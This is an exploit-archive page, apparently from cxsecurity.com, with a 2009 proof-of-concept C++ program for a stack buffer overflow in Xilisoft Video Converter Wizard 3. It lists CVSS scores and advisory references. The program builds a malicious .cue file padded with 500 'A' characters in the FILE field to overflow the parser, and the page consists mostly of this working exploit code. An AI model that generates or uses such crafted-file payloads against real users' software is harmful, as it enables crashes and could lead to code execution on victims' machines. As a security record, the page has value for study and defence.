Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow PoC

2009.04.25
Credit: fl0 fl0w
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* ---------------------------------------------------------------------------------------- Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC name: xilisoft.cpp Credits : fl0 fl0w ---------------------------------------------------------------------------------------- ScreanShot in the debugger Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg ---------------------------------------------------------------------------------------- */ //Start #include <stdio.h> #include <string.h> #include <stdio.h> #include <assert.h> #include <windows.h> #define SIZE 100000 #define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.." class EXPLOIT { public: int check (char *, char *); void Usage (char *); }; static int Poz = 1; static int Neg = 0; int i; char Name [SIZE]; char NeWbuff [SIZE]; int main (int argc, char *argv []) { EXPLOIT VIDEO; if ( argc < 2) VIDEO.Usage ( argv [0]); if ( VIDEO.check ( argv [1], "-file") == Neg) { fprintf ( stdout , " Incorect input "); printf ( " \t..Usage is %s -file filename.. \n", Name); exit ( 0); } do { NeWbuff [i] = 'A'; i++; }while (i < 500); FILE *f; strcpy (Name, argv [2]); strcat (Name, " .cue "); f = fopen (Name, "w"); assert ( f != NULL); strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); fputs("FILE \"", f); fprintf ( f, " %s ", NeWbuff); fprintf ( stdout , "File build ! "); exit ( 0); getchar (); return 0; } int EXPLOIT::check (char *Arg_, char *_Arg) { if ( strcmp ( Arg_, _Arg) == 0) return Poz; return Neg; } void EXPLOIT::Usage (char *Name) { system ("cls"); fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n "); printf ( " \t..Usage is %s -file filename.. \n", Name); fprintf ( stdout , "..All Credits fl0 fl0w.. \n"); } //EOF

References:

http://xforce.iss.net/xforce/xfdb/49807
http://www.securityfocus.com/bid/34472
http://www.milw0rm.com/exploits/8390
http://secunia.com/advisories/34660


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top